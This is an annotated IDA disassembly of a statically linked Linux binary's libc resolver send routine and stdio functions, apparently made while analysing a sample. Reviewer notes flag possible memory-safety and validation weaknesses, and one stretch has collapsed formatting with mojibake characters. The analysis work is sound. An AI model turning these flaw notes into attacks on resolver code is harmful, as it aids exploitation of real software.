        jg short loc_804EE50
loc_804EE38: ; CODE XREF: sub_804EA0C+413j
        mov eax, __errno
        mov [ebp+var_23C], eax
        push eax
        push offset aReadVc ; "read(vc)"
        jmp loc_804F193
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804EE50: ; CODE XREF: sub_804EA0C+42Aj
        ; If the answer was clamped: set bit 2 in byte 2 of the answer header
        ; (presumably the TC flag) and drain the excess bytes from the
        ; stream into the 200h-byte scratch area, at most 200h per read.
        cmp [ebp+var_24C], 0
        jz loc_804F358
        mov ecx, [ebp+var_230]
        or byte ptr [ecx+2], 2
        mov di, word ptr [ebp+var_8]
        sub di, word ptr [ebp+arg_C]
        mov [ebp+var_1A], di
        jz loc_804F358
        db 8Dh,76h,0 ; lea esi, [esi+0]
loc_804EE7C: ; CODE XREF: sub_804EA0C+4ACj
        mov ebx, 200h
        cmp [ebp+var_1A], 200h
        ja short loc_804EE8D
        movzx ebx, [ebp+var_1A]
loc_804EE8D: ; CODE XREF: sub_804EA0C+47Bj
        push ebx
        lea eax, [ebp+var_21C]
        push eax
        mov eax, dword_8078530
        push eax
        call read
        mov ebx, eax
        add esp, 0Ch
        test ebx, ebx
        jle loc_804F358
        mov ax, [ebp+var_1A]
        sub ax, bx
        mov [ebp+var_1A], ax
        jnz short loc_804EE7C
        jmp loc_804F358
; ---------------------------------------------------------------------------
        align 4
loc_804EEC0: ; CODE XREF: sub_804EA0C+1A7j
        ; Datagram path: reuse the descriptor unless it is missing or was
        ; last used as a stream socket.
        cmp dword_8078530, 0
        jl short loc_804EED2
        cmp dword_8078538, 0
        jz short loc_804EF05
loc_804EED2: ; CODE XREF: sub_804EA0C+4BBj
        cmp dword_8078538, 0
        jz short loc_804EEE0
        call sub_804F4F8
loc_804EEE0: ; CODE XREF: sub_804EA0C+4CDj
        ; socket(2, 2, 0): AF_INET, SOCK_DGRAM on Linux.
        push 0
        push 2
        push 2
        call socket
        mov dword_8078530, eax
        add esp, 0Ch
        test eax, eax
        jl loc_804F4C4
        mov dword_8078534, 0
loc_804EF05: ; CODE XREF: sub_804EA0C+4C4j
        ; Use a connected datagram socket only with a single server, or on
        ; the first pass with the first server; otherwise use sendto.
        cmp dword_8078550, 1
        jz short loc_804EF23
        cmp [ebp+var_240], 0
        jnz loc_804EFBC
        test esi, esi
        jnz loc_804EFBC
loc_804EF23: ; CODE XREF: sub_804EA0C+500j
        cmp dword_8078534, 0
        jnz short loc_804EF72
        push 10h
        mov eax, [ebp+var_4]
        push eax
        mov eax, dword_8078530
        push eax
        call connect
        add esp, 0Ch
        test eax, eax
        jge short loc_804EF68
        mov edx, [ebp+var_4]
        mov eax, [edx+0Ch]
        push eax
        mov eax, [edx+8]
        push eax
        mov eax, [edx+4]
        push eax
        mov eax, [edx]
        push eax
        mov eax, __errno
        push eax
        push offset aConnectDg ; "connect(dg)"
        jmp loc_804F04C
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804EF68: ; CODE XREF: sub_804EA0C+536j
        mov dword_8078534, 1
loc_804EF72: ; CODE XREF: sub_804EA0C+51Ej
        push 0
        mov eax, [ebp+arg_4]
        push eax
        mov eax, [ebp+arg_0]
        push eax
        mov eax, dword_8078530
        push eax
        call send
        add esp, 10h
        cmp [ebp+arg_4], eax
        jz loc_804F074
        mov eax, __errno
        push eax
        push offset aSend ; "send"
        push offset unk_80787A4
        call sub_804E694
        mov eax, 1
        mov ecx, esi
        shl eax, cl
        or [ebp+var_248], eax
        jmp loc_804F19D
; ---------------------------------------------------------------------------
loc_804EFBC: ; CODE XREF: sub_804EA0C+509j
             ; sub_804EA0C+511j
        ; Undo an earlier connect on the datagram socket by connecting to an
        ; all-zero address record (family 2, port 0, address 0); the result
        ; is ignored and errno cleared.
        cmp dword_8078534, 0
        jz short loc_804F00C
        mov [ebp+var_1EC], 2
        mov [ebp+var_1E8], 0
        mov [ebp+var_1EA], 0
        push 10h
        lea eax, [ebp+var_1EC]
        push eax
        mov eax, dword_8078530
        push eax
        call connect
        mov dword_8078534, 0
        mov __errno, 0
        add esp, 0Ch
loc_804F00C: ; CODE XREF: sub_804EA0C+5B7j
        push 10h
        mov eax, [ebp+var_4]
        push eax
        push 0
        mov eax, [ebp+arg_4]
        push eax
        mov eax, [ebp+arg_0]
        push eax
        mov eax, dword_8078530
        push eax
        call sendto
        add esp, 18h
        cmp [ebp+arg_4], eax
        jz short loc_804F074
        mov edx, [ebp+var_4]
        mov eax, [edx+0Ch]
        push eax
        mov eax, [edx+8]
        push eax
        mov eax, [edx+4]
        push eax
        mov eax, [edx]
        push eax
        mov eax, __errno
        push eax
        push offset aSendto ; "sendto"
loc_804F04C: ; CODE XREF: sub_804EA0C+555j
        push offset unk_80787A4
        call sub_804E638
        mov eax, 1
        mov ecx, esi
        shl eax, cl
        or [ebp+var_248], eax
loc_804F065: ; CODE XREF: sub_804EA0C+26Aj
        call sub_804F4F8
        add esp, 1Ch
        jmp loc_804F450
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804F074: ; CODE XREF: sub_804EA0C+581j
             ; sub_804EA0C+621j
        ; Timeout = dword_8078544 << pass number, divided by the server count
        ; on later passes, with a floor of 1.
        mov edx, dword_8078544
        mov ecx, [ebp+var_240]
        shl edx, cl
        mov [ebp+var_224], edx
        test ecx, ecx
        jle short loc_804F09B
        mov eax, edx
        cdq
        idiv dword_8078550
        mov [ebp+var_224], eax
loc_804F09B: ; CODE XREF: sub_804EA0C+67Ej
        cmp [ebp+var_224], 0
        jg short loc_804F0AE
        mov [ebp+var_224], 1
loc_804F0AE: ; CODE XREF: sub_804EA0C+696j
        mov [ebp+var_220], 0
loc_804F0B8: ; CODE XREF: sub_804EA0C+6F3j
             ; sub_804EA0C+7CEj ...
        ; Build the descriptor set for select: 8 dwords (256 bits) are zeroed
        ; and the bit for the socket descriptor is set with bts.
        ; NOTE(review): the descriptor value is not range-checked before the
        ; bts. bts with a register bit index can address memory beyond the
        ; 20h-byte set, so a descriptor >= 256 would set a bit elsewhere in
        ; this stack frame. Only reachable if the process holds that many
        ; open descriptors -- confirm whether the program can get there.
        lea edx, [ebp+var_21C]
        xor eax, eax
        mov ecx, 8
        mov edi, edx
        cld
        repe stosd
        mov eax, dword_8078530
        bts [ebp+var_21C], eax
        lea ecx, [ebp+var_224]
        push ecx
        push 0
        push 0
        push edx
        mov edi, dword_8078530
        inc edi
        push edi
        call select
        mov ebx, eax
        add esp, 14h
        test ebx, ebx
        jge short loc_804F114
        cmp __errno, 4 ; 4 = EINTR on Linux: simply wait again
        jz short loc_804F0B8
        mov eax, __errno
        push eax
        push offset aSelect ; "select"
        jmp loc_804F193
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------
loc_804F114: ; CODE XREF: sub_804EA0C+6EAj
        test ebx, ebx
        jnz short loc_804F144
        test byte ptr dword_807854C, 2
        jz short loc_804F133
        push offset aTimeout ; ";; timeout\n"
        push offset unk_8078750
        call fprintf
        add esp, 8
loc_804F133: ; CODE XREF: sub_804EA0C+713j
        mov [ebp+var_234], 1
        jmp loc_804EB0C ; case 0x1
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804F144: ; CODE XREF: sub_804EA0C+70Aj
        ; recvfrom(fd, arg_8, arg_C, 0, &var_1FC, &var_228) with var_228 = 10h:
        ; the sender's address record lands in var_1FC.
        mov __errno, 0
        mov [ebp+var_228], 10h
        lea eax, [ebp+var_228]
        push eax
        lea ecx, [ebp+var_1FC]
        push ecx
        push 0
        mov edi, [ebp+arg_C]
        push edi
        mov eax, [ebp+arg_8]
        push eax
        mov ecx, dword_8078530
        push ecx
        call recvfrom
        mov edx, eax
        mov [ebp+var_8], edx
        add esp, 18h
        test edx, edx
        jg short loc_804F1AC
        mov eax, __errno
        push eax
        push offset aRecvfrom ; "recvfrom"
loc_804F193: ; CODE XREF: sub_804EA0C+43Dj
             ; sub_804EA0C+700j
        push offset unk_80787A4
        call sub_804E694
loc_804F19D: ; CODE XREF: sub_804EA0C+2E8j
             ; sub_804EA0C+5ABj
        call sub_804F4F8
        add esp, 0Ch
        jmp loc_804F450
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804F1AC: ; CODE XREF: sub_804EA0C+77Aj
        ; Datagram answer validation, in three steps. A datagram that fails
        ; a step is ignored and the code waits again at loc_804F0B8.
        ; NOTE(review): any length > 0 is accepted above, so for a very short
        ; datagram the header bytes examined below may be stale contents of
        ; the caller's buffer rather than received data.
        ; Step 1: the first 16 bits of the answer must equal the first 16
        ; bits of the query (the message ID).
        mov [ebp+var_234], 1
        mov edi, [ebp+var_22C]
        mov di, [edi]
        mov eax, [ebp+var_230]
        cmp [eax], di
        jz short loc_804F204
        test byte ptr dword_807854C, 2
        jnz short loc_804F1E0
        test byte ptr dword_80786A4+1, 20h
        jz loc_804F0B8
loc_804F1E0: ; CODE XREF: sub_804EA0C+7C5j
        push offset aOldAnswer ; ";; old answer:\n"
        push offset unk_8078750
        call fprintf
        push offset unk_8078750
        mov ecx, [ebp+var_8]
        push ecx
        mov edi, [ebp+arg_8]
        push edi
        jmp loc_804F29F
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------
loc_804F204: ; CODE XREF: sub_804EA0C+7BCj
        ; Step 2: the sender must be one of the configured servers
        ; (sub_804E6F8). This check is skipped entirely when bit 400h of
        ; dword_807854C is set.
        test byte ptr dword_807854C+1, 4
        jnz short loc_804F240
        lea eax, [ebp+var_1FC]
        push eax
        call sub_804E6F8
        add esp, 4
        test eax, eax
        jnz short loc_804F240
        test byte ptr dword_807854C, 2
        jnz short loc_804F236
        test byte ptr dword_80786A4+1, 20h
        jz loc_804F0B8
loc_804F236: ; CODE XREF: sub_804EA0C+81Bj
        push offset aNotOurServer ; ";; not our server:\n"
        jmp short loc_804F288
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------
loc_804F240: ; CODE XREF: sub_804EA0C+7FFj
             ; sub_804EA0C+812j
        ; Step 3: the answer's question section must match the query's
        ; (sub_804E944). Skipped when bit 800h of dword_807854C is set.
        ; NOTE(review): the answer's end pointer passed here is arg_8 + arg_C
        ; (buffer size), not arg_8 + var_8 (bytes received), and only a zero
        ; result rejects the answer, so sub_804E944's 0FFFFFFFFh parse-failure
        ; value is accepted.
        test byte ptr dword_807854C+1, 8
        jnz short loc_804F2AC
        mov edi, [ebp+arg_8]
        add edi, [ebp+arg_C]
        push edi
        mov eax, [ebp+arg_8]
        push eax
        mov ecx, [ebp+arg_0]
        add ecx, [ebp+arg_4]
        push ecx
        mov edi, [ebp+arg_0]
        push edi
        call sub_804E944
        mov edx, eax
        add esp, 10h
        test edx, edx
        jnz short loc_804F2AC
        test byte ptr dword_807854C, 2
        jnz short loc_804F283
        test byte ptr dword_80786A4+1, 20h
        jz loc_804F0B8
loc_804F283: ; CODE XREF: sub_804EA0C+868j
        push offset aWrongQueryName ; ";; wrong query name:\n"
loc_804F288: ; CODE XREF: sub_804EA0C+82Fj
        push offset unk_8078750
        call fprintf
        push offset unk_8078750
        mov eax, [ebp+var_8]
        push eax
        mov ecx, [ebp+arg_8]
        push ecx
loc_804F29F: ; CODE XREF: sub_804EA0C+7F0j
        call sub_805F1DC
        add esp, 14h
        jmp loc_804F0B8
; ---------------------------------------------------------------------------
loc_804F2AC: ; CODE XREF: sub_804EA0C+83Bj
             ; sub_804EA0C+85Fj
        ; Low nibble of answer byte 3 (presumably the DNS rcode): values 2, 4
        ; and 5 mean the server refused to help -- mark it bad.
        mov edi, [ebp+var_230]
        mov dl, [edi+3]
        and dl, 0Fh
        cmp dl, 2
        jz short loc_804F2C5
        mov al, dl
        add al, 0FCh
        cmp al, 1
        ja short loc_804F313
loc_804F2C5: ; CODE XREF: sub_804EA0C+8AFj
        test byte ptr dword_807854C, 2
        jz short loc_804F2F2
        push offset aServerRejected ; "server rejected query:\n"
        push offset unk_8078750
        call fprintf
        push offset unk_8078750
        mov eax, [ebp+var_8]
        push eax
        mov ecx, [ebp+arg_8]
        push ecx
        call sub_805F1DC
        add esp, 14h
loc_804F2F2: ; CODE XREF: sub_804EA0C+8C0j
        mov eax, 1
        mov ecx, esi
        shl eax, cl
        or [ebp+var_248], eax
        call sub_804F4F8
        cmp dword_80786A4, 0
        jz loc_804F450
loc_804F313: ; CODE XREF: sub_804EA0C+8B7j
        ; Answer flagged as truncated (bit 2 of header byte 2) and bit 20h of
        ; dword_807854C clear: switch to stream mode and retry this server.
        test byte ptr dword_807854C, 20h
        jnz short loc_804F358
        mov edi, [ebp+var_230]
        test byte ptr [edi+2], 2
        jz short loc_804F358
        test byte ptr dword_807854C, 2
        jz short loc_804F343
        push offset aTruncatedAnswe ; ";; truncated answer\n"
        push offset unk_8078750
        call fprintf
        add esp, 8
loc_804F343: ; CODE XREF: sub_804EA0C+923j
        mov [ebp+var_244], 1
        call sub_804F4F8
        jmp loc_804EB01
; ---------------------------------------------------------------------------
        align 4
loc_804F358: ; CODE XREF: sub_804EA0C+44Bj
             ; sub_804EA0C+467j ...
        ; Answer accepted: optional debug output, then decide whether to keep
        ; the socket open.
        test byte ptr dword_807854C, 2
        jnz short loc_804F372
        mov eax, dword_80786A4
        and eax, 2100h
        cmp eax, 2100h
        jnz short loc_804F384
loc_804F372: ; CODE XREF: sub_804EA0C+953j
        push offset aGotAnswer ; ";; got answer:\n"
        push offset unk_8078750
        call fprintf
        add esp, 8
loc_804F384: ; CODE XREF: sub_804EA0C+964j
        test byte ptr dword_807854C, 2
        jnz short loc_804F396
        test byte ptr dword_80786A4+1, 20h
        jz short loc_804F3BA
loc_804F396: ; CODE XREF: sub_804EA0C+97Fj
        push offset unk_8067EE3
        push offset unk_8078750
        call fprintf
        push offset unk_8078750
        mov eax, [ebp+var_8]
        push eax
        mov ecx, [ebp+arg_8]
        push ecx
        call sub_805F1DC
        add esp, 14h
loc_804F3BA: ; CODE XREF: sub_804EA0C+988j
        ; The socket stays open only when bit 100h of dword_807854C is set
        ; and either datagram mode was used, or stream mode was requested via
        ; bit 8 and the first server answered.
        cmp [ebp+var_244], 0
        jz short loc_804F3D0
        test byte ptr dword_807854C, 8
        jz short loc_804F3D9
        test esi, esi
        jnz short loc_804F3D9
loc_804F3D0: ; CODE XREF: sub_804EA0C+9B5j
        test byte ptr dword_807854C+1, 1
        jnz short loc_804F3DE
loc_804F3D9: ; CODE XREF: sub_804EA0C+9BEj
             ; sub_804EA0C+9C2j
        call sub_804F4F8
loc_804F3DE: ; CODE XREF: sub_804EA0C+9CBj
        ; Optional post-receive hook through dword_8078540 (set by
        ; sub_804E6E8); ebx counts repeat requests.
        cmp dword_8078540, 0
        jz short loc_804F448 ; case 0x3
        xor ebx, ebx
db 8Dh,76h,0 ; lea esi, [esi+0] loc_804F3EC: ; CODE XREF: sub_804EA0C+A3Aj lea edi, [ebp+var_8] push edi mov eax, [ebp+arg_C] push eax mov ecx, [ebp+arg_8] push ecx mov edi, [ebp+arg_4] push edi mov eax, [ebp+arg_0] push eax mov ecx, [ebp+var_4] push ecx mov edi, dword_8078540 call edi mov edx, eax add esp, 18h cmp edx, 4 ; switch 5 cases ja loc_804F4E4 ; default jmp ds:off_804F424[edx*4] ; switch jump ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 off_804F424 dd offset loc_804F448, offset loc_804EB0C, offset loc_804F438 ; DATA XREF: sub_804EA0C+A0Er dd offset loc_804F448, offset loc_804F4E4 ; jump table for switch statement ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804F438: ; CODE XREF: sub_804EA0C+A0Ej ; DATA XREF: sub_804EA0C+A18o inc ebx ; case 0x2 cmp ebx, 29h jg loc_804F4E4 ; default xor eax, eax test eax, eax jz short loc_804F3EC loc_804F448: ; CODE XREF: sub_804EA0C+146j ; sub_804EA0C+9D9j ... mov eax, [ebp+var_8] ; case 0x3 jmp loc_804F4E9 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804F450: ; CODE XREF: sub_804EA0C+105j ; sub_804EA0C+661j ... 
inc esi cmp dword_8078550, esi jg loc_804EAF4 loc_804F45D: ; CODE XREF: sub_804EA0C+E0j inc [ebp+var_240] mov ecx, [ebp+var_240] cmp dword_8078548, ecx jg loc_804EAE4 loc_804F475: ; CODE XREF: sub_804EA0C+CFj call sub_804F4F8 cmp [ebp+var_244], 0 jnz short loc_804F4D8 cmp [ebp+var_234], 0 jnz short loc_804F498 mov __errno, 6Fh jmp short loc_804F4E4 ; default ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804F498: ; CODE XREF: sub_804EA0C+A7Ej mov __errno, 6Eh jmp short loc_804F4E4 ; default ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804F4A4: ; CODE XREF: sub_804EA0C+1FEj mov edi, __errno mov [ebp+var_23C], edi push edi push offset aSocketVc ; "socket(vc)" loc_804F4B6: ; CODE XREF: sub_804EA0C+AC9j push offset unk_80787A4 call sub_804E694 jmp short loc_804F4E4 ; default ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804F4C4: ; CODE XREF: sub_804EA0C+4E9j mov eax, __errno mov [ebp+var_23C], eax push eax push offset aSocketDg ; "socket(dg)" jmp short loc_804F4B6 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804F4D8: ; CODE XREF: sub_804EA0C+A75j mov ecx, [ebp+var_23C] mov __errno, ecx loc_804F4E4: ; CODE XREF: sub_804EA0C+2Fj ; sub_804EA0C+140j ... mov eax, 0FFFFFFFFh ; default loc_804F4E9: ; CODE XREF: sub_804EA0C+A3Fj lea esp, [ebp+var_264] pop ebx pop esi pop edi mov esp, ebp pop ebp retn sub_804EA0C endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden sub_804F4F8 proc near ; CODE XREF: sub_804EA0C+100p ; sub_804EA0C+1E1p ... 
; sub_804F4F8, body (its "proc near" line is directly above this point).
; When the descriptor cached in dword_8078530 is non-negative it is passed to
; close(), then the cache is reset: dword_8078530 = -1, dword_8078534 = 0,
; dword_8078538 = 0. Takes no arguments; eax on return is not meaningful.
; NOTE(review): the callers listed in its cross-reference comment are inside
; sub_804EA0C, whose ";; got answer:" / "socket(dg)" strings look like the
; libc resolver's send routine, so this is presumably that routine's
; socket-close helper (statically linked library code, not sample logic) -
; confirm with library signatures.
                push    ebp
                mov     ebp, esp
                cmp     dword_8078530, 0
                jl      short loc_804F52D       ; negative: nothing is open, skip the close
                mov     eax, dword_8078530
                push    eax
                call    close                   ; result ignored; the argument is discarded by "mov esp, ebp"
                mov     dword_8078530, 0FFFFFFFFh ; mark the descriptor as closed (-1)
                mov     dword_8078534, 0
                mov     dword_8078538, 0

loc_804F52D:                                    ; CODE XREF: sub_804F4F8+Aj
                mov     esp, ebp
                pop     ebp
                retn
sub_804F4F8     endp

; ───────────────────────────────────────────────────────────────────────────
                db 3 dup(90h)                   ; three NOP bytes of padding

; ███████████████ S U B R O U T I N E ███████████████████████████████████████

; Attributes: bp-based frame hidden

; sub_804F534: returns the address of dword_8078544 in eax. No arguments, no
; other effect. No cross-reference is listed for it in this listing.
; NOTE(review): dword_8078544 sits directly below dword_8078548,
; dword_807854C and dword_8078550, which sub_804EA0C uses as loop limits and
; flag words, so this is presumably an accessor for the resolver state
; block - confirm.
sub_804F534     proc near
                push    ebp
                mov     ebp, esp
                mov     eax, offset dword_8078544
                mov     esp, ebp
                pop     ebp
                retn
sub_804F534     endp

; ███████████████ S U B R O U T I N E ███████████████████████████████████████

; Attributes: bp-based frame hidden

; fclose(fp): statically linked stdio routine.
;   arg_0 = fp, pointer to the stream object.
;   Returns -1 with errno = 22 (16h, EINVAL on Linux) when fp is NULL or the
;   upper 16 bits of its first dword are not 0FBADh (0FBAD0000h is the
;   _IO_MAGIC tag of GNU libio streams). Otherwise returns the status
;   collected in esi: the result of sub_8060D44 when bit 20h of flag byte 1
;   is set, else -1 if bit 20h of flag byte 0 is set, else 0.
;   The object is handed to free() unless it is one of three fixed objects
;   (unk_80786FC, unk_8078750, unk_80787A4). printf passes unk_8078750 to
;   vfprintf, so that one is this build's stdout; the other two lie 54h bytes
;   either side of it and are presumably stdin and stderr - confirm.
; NOTE(review): flag bit names (2000h = _IO_IS_FILEBUF, 20h = _IO_ERR_SEEN)
; are taken from GNU libio headers; verify against the libc version that was
; linked in.
fclose          proc near                       ; CODE XREF: main+5CCp
                                                ; init_services_resolv+A56p ...

var_8           = byte ptr -8
arg_0           = dword ptr  8

                push    ebp
                mov     ebp, esp
                push    esi
                push    ebx
                mov     ebx, [ebp+arg_0]        ; ebx = fp for the whole function
                test    ebx, ebx
                jz      short loc_804F55A       ; NULL stream: EINVAL
                mov     eax, [ebx]
                and     eax, 0FFFF0000h         ; keep only the magic half of the flags word
                cmp     eax, 0FBAD0000h
                jz      short loc_804F56C       ; magic matches: proceed with the close

loc_804F55A:                                    ; CODE XREF: fclose+Aj
                mov     __errno, 16h            ; errno = 22
                mov     eax, 0FFFFFFFFh
                jmp     short loc_804F5B8
; ───────────────────────────────────────────────────────────────────────────
                align 4

loc_804F56C:                                    ; CODE XREF: fclose+18j
                test    byte ptr [ebx+1], 20h   ; bit 2000h of the flags word
                jz      short loc_804F580
                push    ebx
                call    sub_8060D44             ; presumably the file-backed close routine - confirm
                mov     esi, eax                ; esi = status to return
                add     esp, 4
                jmp     short loc_804F58C
; ───────────────────────────────────────────────────────────────────────────
                align 4

loc_804F580:                                    ; CODE XREF: fclose+30j
                xor     esi, esi                ; status 0 unless the flag below is set
                test    byte ptr [ebx], 20h     ; bit 20h of the flags word
                jz      short loc_804F58C
                mov     esi, 0FFFFFFFFh         ; flag set: report -1

loc_804F58C:                                    ; CODE XREF: fclose+3Dj fclose+45j
                mov     eax, [ebx+50h]          ; table pointer stored at fp+50h (fopen writes unk_807902C there)
                push    ebx
                mov     eax, [eax+0Ch]          ; slot +0Ch of that table
                call    eax                     ; indirect call with fp; presumably the stream's finish hook
                add     esp, 4
                cmp     ebx, offset unk_80786FC ; the three fixed stream objects are never freed
                jz      short loc_804F5B6
                cmp     ebx, offset unk_8078750
                jz      short loc_804F5B6
                cmp     ebx, offset unk_80787A4
                jz      short loc_804F5B6
                push    ebx
                call    free                    ; any other stream object is released here

loc_804F5B6:                                    ; CODE XREF: fclose+5Ej fclose+66j ...
                mov     eax, esi

loc_804F5B8:                                    ; CODE XREF: fclose+29j
                lea     esp, [ebp+var_8]        ; drops any arguments still on the stack
                pop     ebx
                pop     esi
                mov     esp, ebp
                pop     ebp
                retn
fclose          endp

; ───────────────────────────────────────────────────────────────────────────
                db 3 dup(90h)                   ; three NOP bytes of padding

; ███████████████ S U B R O U T I N E ███████████████████████████████████████

; Attributes: bp-based frame hidden

; fgets(buf, n, fp): statically linked stdio routine.
;   arg_0 = buf, arg_4 = n, arg_8 = fp.
;   Returns buf on success. Returns 0 (NULL) when fp fails the NULL / magic
;   check (errno = 22 in that case), when n <= 0, when sub_804F734 copied
;   nothing, or when bit 20h of the stream flags is set after the read.
;   At most n-1 bytes are requested from sub_804F734 and the terminator is
;   written at buf[count], so the write stays inside an n-byte buffer.
fgets           proc near                       ; CODE XREF: init_services_resolv+97p
                                                ; sub_804C5A4+4Cp ...

var_8           = byte ptr -8
arg_0           = dword ptr  8
arg_4           = dword ptr  0Ch
arg_8           = dword ptr  10h

                push    ebp
                mov     ebp, esp
                push    esi
                push    ebx
                mov     esi, [ebp+arg_0]        ; esi = buf
                mov     edx, [ebp+arg_4]        ; edx = n
                mov     ebx, [ebp+arg_8]        ; ebx = fp
                test    ebx, ebx
                jz      short loc_804F5E4
                mov     eax, [ebx]
                and     eax, 0FFFF0000h
                cmp     eax, 0FBAD0000h         ; same stream magic check as fclose
                jz      short loc_804F5F4

loc_804F5E4:                                    ; CODE XREF: fgets+10j
                mov     __errno, 16h            ; errno = 22

loc_804F5EE:                                    ; CODE XREF: fgets+32j fgets+45j ...
                xor     eax, eax                ; common "return NULL" exit
                jmp     short loc_804F616
; ───────────────────────────────────────────────────────────────────────────
                db 8Dh, 36h                     ; two filler bytes, left undecoded
; ───────────────────────────────────────────────────────────────────────────

loc_804F5F4:                                    ; CODE XREF: fgets+1Ej
                test    edx, edx
                jle     short loc_804F5EE       ; n <= 0: nothing can be stored
                push    1                       ; arg_10 of sub_804F734: copy the delimiter as well
                push    0Ah                     ; delimiter = newline
                lea     eax, [edx-1]            ; leave one byte for the terminator
                push    eax
                push    esi
                push    ebx
                call    sub_804F734             ; returns the number of bytes copied into buf
                test    eax, eax
                jz      short loc_804F5EE       ; nothing read
                test    byte ptr [ebx], 20h     ; bit 20h of the flags word set: treat as failure
                jnz     short loc_804F5EE
                mov     byte ptr [eax+esi], 0   ; terminate at buf[count]
                mov     eax, esi

loc_804F616:                                    ; CODE XREF: fgets+2Cj
                lea     esp, [ebp+var_8]        ; also discards the five pushed arguments
                pop     ebx
                pop     esi
                mov     esp, ebp
                pop     ebp
                retn
fgets           endp

; ───────────────────────────────────────────────────────────────────────────
                align 4

; ███████████████ S U B R O U T I N E ███████████████████████████████████████

; Attributes: bp-based frame hidden

fopen           proc near                       ; CODE XREF: main+4ECp
                                                ; init_services_resolv+4Ap ...
; fopen(path, mode), body (the "fopen proc near" line is directly above).
; Statically linked stdio routine.
;   arg_0 = path, arg_4 = mode; both are forwarded unchanged to sub_8060E20.
;   Allocates a 54h-byte stream object with malloc, initialises it
;   (sub_8061F34, table pointer unk_807902C at +50h, sub_8060D24) and asks
;   sub_8060E20 to open the file.
;   Returns the stream pointer, or 0 (NULL) when malloc fails or when
;   sub_8060E20 returns 0; in the latter case the object is passed to
;   sub_8061788 and freed first.
; NOTE(review): helper roles are inferred from argument shapes only;
; sub_8061788 is presumably the "unlink from the open-stream list" step -
; confirm with library signatures.

var_C           = byte ptr -0Ch
arg_0           = dword ptr  8
arg_4           = dword ptr  0Ch

                push    ebp
                mov     ebp, esp
                push    edi
                push    esi
                push    ebx
                mov     edi, [ebp+arg_0]        ; edi = path
                mov     esi, [ebp+arg_4]        ; esi = mode
                push    54h                     ; size of one stream object
                call    malloc
                mov     ebx, eax                ; ebx = new stream object
                add     esp, 4
                test    ebx, ebx
                jnz     short loc_804F640
                xor     eax, eax                ; allocation failed: return NULL
                jmp     short loc_804F676
; ───────────────────────────────────────────────────────────────────────────

loc_804F640:                                    ; CODE XREF: fopen+1Aj
                push    0
                push    ebx
                call    sub_8061F34             ; (stream, 0): generic stream initialiser
                mov     dword ptr [ebx+50h], offset unk_807902C ; table later used for indirect calls (see fclose)
                push    ebx
                call    sub_8060D24             ; (stream): second initialisation step
                push    esi
                push    edi
                push    ebx
                call    sub_8060E20             ; (stream, path, mode): performs the open
                add     esp, 18h                ; pops the six arguments of the three calls above
                test    eax, eax
                jnz     short loc_804F674       ; non-zero: open succeeded
                push    ebx
                call    sub_8061788             ; failure path: detach the half-built stream
                push    ebx
                call    free                    ; and release it so the error path does not leak
                xor     eax, eax
                jmp     short loc_804F676
; ───────────────────────────────────────────────────────────────────────────

loc_804F674:                                    ; CODE XREF: fopen+42j
                mov     eax, ebx                ; success: return the stream

loc_804F676:                                    ; CODE XREF: fopen+1Ej fopen+52j
                lea     esp, [ebp+var_C]        ; discards any arguments still pushed
                pop     ebx
                pop     esi
                pop     edi
                mov     esp, ebp
                pop     ebp
                retn
fopen           endp

; ███████████████ S U B R O U T I N E ███████████████████████████████████████

; Attributes: bp-based frame hidden

fprintf         proc near                       ; CODE XREF: init_services_resolv+2B7p
                                                ; init_services_resolv+2DDp ...
; fprintf(fp, format, ...), body (the "fprintf proc near" line is directly
; above). Statically linked stdio routine.
;   arg_0 = fp, arg_4 = format, arg_8 = first variadic argument.
;   Returns -1 with errno = 22 (16h, EINVAL on Linux) when fp is NULL or does
;   not carry the 0FBADh stream magic; otherwise returns whatever vfprintf
;   returns for (fp, format, &arg_8).

arg_0           = dword ptr  8
arg_4           = dword ptr  0Ch
arg_8           = byte ptr  10h

                push    ebp
                mov     ebp, esp
                mov     edx, [ebp+arg_0]        ; edx = fp
                mov     ecx, [ebp+arg_4]        ; ecx = format
                test    edx, edx
                jnz     short loc_804F6A0
                mov     __errno, 16h            ; NULL stream: errno = 22
                mov     eax, 0FFFFFFFFh
                mov     esp, ebp
                pop     ebp
                retn
; ───────────────────────────────────────────────────────────────────────────

